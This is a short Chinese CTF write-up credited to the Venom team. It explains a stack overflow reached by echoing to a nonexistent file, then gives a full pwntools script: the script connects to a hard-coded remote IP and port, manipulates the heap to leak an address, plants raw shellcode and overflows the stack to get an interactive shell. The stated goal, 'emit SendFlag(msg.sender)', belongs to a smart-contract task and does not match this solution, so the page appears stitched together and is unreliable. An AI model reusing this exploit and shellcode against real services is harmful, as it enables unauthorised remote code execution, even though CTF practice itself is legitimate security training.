点击此处获得更好的阅读体验
WriteUp来源
来自Venom战队发布
题目描述
Your goal is to emit SendFlag(msg.sender)
题目考点
解题思路
当echo一个不存在的文件时会向栈里写数据,输入过长导致栈溢出,先leak堆地址,然后跳到堆执行shellcode
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
| from pwn import *
context.log_level = 'debug'
p = remote("121.37.222.236", 9999)
def add(name):
p.sendlineafter("$ ", "touch "+name)
def free(name):
p.sendlineafter("$ ", "rm "+name)
def show(name):
p.sendlineafter("$ ", "cat "+name)
def edit(name, content):
p.sendlineafter("$ ", "echo > "+name)
p.send(content)
add("aaa")
add("bbb")
add("ccc")
add("ddd")
free("aaa")
free("ccc")
add("a")
show("a")
add("b")
shellcode = "\x01\x11\x06\xec\x22\xe8\x13\x04\x21\x02\xb7\x67\x69\x6e\x93\x87\xf7\x22\x23\x30\xf4\xfe\xb7\x77\x68\x10\x33\x48\x08\x01\x05\x08\x72\x08\xb3\x87\x07\x41\x93\x87\xf7\x32\x23\x32\xf4\xfe\x93\x07\x04\xfe\x01\x46\x81\x45\x3e\x85\x93\x08\xd0\x0d\x73\x00\x00\x00"
edit("b", shellcode)
p.sendlineafter("$ ", "echo > e")
p.send("a"*312+p32(0x25f10))
p.interactive()
|